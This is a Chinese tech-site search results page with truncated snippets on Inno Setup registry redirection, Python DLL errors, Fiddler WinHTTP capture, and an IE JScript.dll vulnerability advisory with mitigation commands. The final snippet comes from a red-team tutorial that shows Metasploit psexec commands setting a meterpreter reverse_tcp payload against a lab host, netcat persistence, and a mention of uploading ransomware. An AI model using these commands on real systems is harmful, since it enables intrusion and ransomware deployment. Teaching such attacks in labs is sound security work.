首页
学习
活动
专区
圈层
工具
发布
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    inno setup读取注册表遇到的一个坑

    其中,prm文件需要复制到PR公共插件目录下,DLL需要复制到Windows系统目录中去,这样插件才能正常的工作。...32bit程序对注册表HKEY_LOCAL_MACHINE根下的项目操作都进行了重定向:读取HKEY_LOCAL_MACHINE\SOFTWARE下的键值都会重定向到HKEY_LOCAL_MACHINE...EnableFsRedirection(OldState); end; end; end;       关键就是通过调用EnableFsRedirection()函数来禁用注册表操作转发行为...Update 2016-3-7:       在64Bit系统上,将动态库文件拷贝到C:\WINDOWS\System32目录下时,会自动重定向到SysWOW64目录下,导致程序运行异常。...这事可以通过设置在[Files]段设置Flags:64即可禁用目录重定向(参考链接)。 三、参考链接 1、http://www.jrsoftware.org/ishelp/index.php?

    3.3K61

    初学者下载使用Python遇到的问题看它

    下载一个该dll文件:把该文件保存在路径:C:\Windows\SysWOW64   在官网下载组件:  https://support.microsoft.com/en-gb/help/2999226.../update-for-universal-c-runtime-in-windows 如果你系统是32位的:把x32文件夹下的api-ms-win-crt-process-l1-1-0.dll放到C:\...Windows\System32目录下即可 如果系统是64位的:把x64文件夹下的api-ms-win-crt-process-l1-1-0.dll放到C:\Windows\System32目录下 然后为了兼容性更好...,再把x32位文件夹下api-ms-win-crt-process-l1-1-0.dll放到C:\Windows\SysWOW64目录下 2、安装完后提示api-ms-win-crt-runtimel1...-1-0.dll 丢失 api-ms-win-crt-runtime就是MFC的运行时环境的库,python在windows上编译也是用微软的visual studio C++编译的,底层也会用到微软提供的

    1.2K30

    定制 Fiddler 之抓获 WinHTTP 请求

    背景 发现使用 Fiddler 进行抓包时有一部分请求总是没抓到,查看了一下源代码,发现使用 WinINET 这套 API 发送的请求都能正常抓到,而使用 WinHTTP 这套 API 发送的请求都没有抓到...Eric 的那篇博客里已经列出了相关的方法和代码,本文只是对其略做改进,让同一段代码可以适配不同的 Windows 版本。...这些通过 Windows 自带命令就可以做到: 在 XP 下: proxycfg -u 在 Win7 下(使用管理员权限的命令行): netsh winhttp import proxy ie 注:在...Win7 64 位系统下需要将 System32 目录和 SysWOW64 目录下的 netsh 命令各执行一次,下方将给出的脚本已覆盖这种情况。...oPSI.FileName = oPSI.FileName = Environment.SystemDirectory.Replace("system32", "syswow64

    76640

    微软Internet Explorer浏览器Jscript.Dll组件远程代码执行漏洞

    受影响范围 受影响范围: IE 11 Windows 7Windows 8.1Windows 10Windows Server 2012/R2Windows Server 2008Windows...Server 2016Windows Server 2019 IE 10 Windows Server 2012 IE 9 Windows Server 2008 可能的攻击风险演化 1) 从威胁框架角度...,这是一个从接触目标与进攻突防角度具有高风险的可利用漏洞,该漏洞曝光前可能被超级网空威胁行为体在类似QUANTUM系统中,用于对高价值目标打点,对此需要进一步的排查分析。...windir%\system32\jscript.dll /E /P everyone:N 2、在64位操作系统中,可以通过以下命令限制对JScript.dll的访问: takeown /f %windir%\syswow64...\jscript.dll cacls %windir%\syswow64\jscript.dll /E /P everyone:N takeown /f %windir%\system32\jscript.dll

    87600

    定制 Fiddler 之抓获 WinHTTP 请求

    背景 发现使用 Fiddler 进行抓包时有一部分请求总是没抓到,查看了一下源代码,发现使用 WinINET 这套 API 发送的请求都能正常抓到,而使用 WinHTTP 这套 API 发送的请求都没有抓到...Eric 的那篇博客里已经列出了相关的方法和代码,本文只是对其略做改进,让同一段代码可以适配不同的 Windows 版本。...这些通过 Windows 自带命令就可以做到: 在 XP 下: proxycfg -u 在 Win7 下(使用管理员权限的命令行): netsh winhttp import proxy ie...注:在 Win7 64 位系统下需要将 System32 目录和 SysWOW64 目录下的 netsh 命令各执行一次,下方将给出的脚本已覆盖这种情况。...oPSI.FileName = oPSI.FileName = Environment.SystemDirectory.Replace("system32", "syswow64

    1.3K10

    红队白帽必经之路(21)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 PC 进行渗透进而达到勒索

    /psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows.../smb/psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp...msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.56 RHOSTS => 192.168.1.56 msf6 exploit(windows...: L 表示用户退出连接后重新进行端口侦听 d 后台运行 p 指定端口 -e prog 程序重定向,一旦连接,就执行 meterpreter > shell 补充: 防火墙允许 443 端口访问网络否则开机的时需要用户点击允许访问网络才可以成功执行...\SysWOW64>exit MSF 控制台连接 msf6 > connect 192.168.1.56 443 退出,使用 Ctrl+c 退出即可 2.扩展 前面可以上传 nc 程序,当然也可以上传勒索病毒过程如下

    24710
    领券